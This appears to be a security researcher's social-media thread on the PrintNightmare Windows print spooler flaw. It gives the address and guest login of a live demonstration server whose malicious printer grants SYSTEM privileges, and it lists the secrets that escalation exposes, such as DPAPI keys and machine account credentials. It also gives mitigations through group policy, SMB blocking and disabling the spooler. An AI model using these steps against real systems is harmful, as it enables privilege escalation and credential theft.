Little #printnightmare (ep 4.3) upgrade : user-to-system as a service🥝
> Open SYSTEM prompt

connect to \\printnightmare[.]gentilkiwi[.]com (remove [ ]) with
- user: .\gentilguest
- password: password

Open 'Kiwi Legit Printer - x64', enjoy SYSTEM
(just one printer this time🤪) Of course, video quality: video.twimg.com/tweet_video/E7…

Q: what can you do when you have #mimikatz🥝 & some Read access on Windows system files like SYSTEM, SAM and SECURITY?

A: Local Privilege Escalation 🥳

Thank you @jonasLyk for this Read access on default Windows😘 Ho, and this is not only SAM, but also SYSTEM & SECURITY.
So you can find "interesting" data, like:
- default windows install password (can be valid, trust me 👍)
- DPAPI computer keys (decrypt all computer private keys, etc.)
- Computer Machine account (silver ticket)
- ...

Want to test #printnightmare (ep 4.x) user-to-system as a service?🥝
(POC only, will write a log file to system32)

connect to \\printnightmare.gentilkiwi.com with
- user: .\gentilguest
- password: password

Open 'Kiwi Legit Printer - x64', then 'Kiwi Legit Printer - x64 (another one)' You can prevent this behavior by settings some parameters/GPO:

'Package Point and print - Approved servers'
> docs.microsoft.com/troubleshoot/w…
> admx.help/?Category=Wind…

Of course, disable outbound access to CIFS/SMB/RPC...

This #printnightmare / CVE-2021-1675 is really serious 🤪

Just adapted/simplified original POC then:
*From Remote standard user to SYSTEM*

Here on a domain controller, but valid on all systems with RPC to spooler available, remote or local

➡️ disable service now (no patch yet) As usual, video quality: video.twimg.com/tweet_video/E5…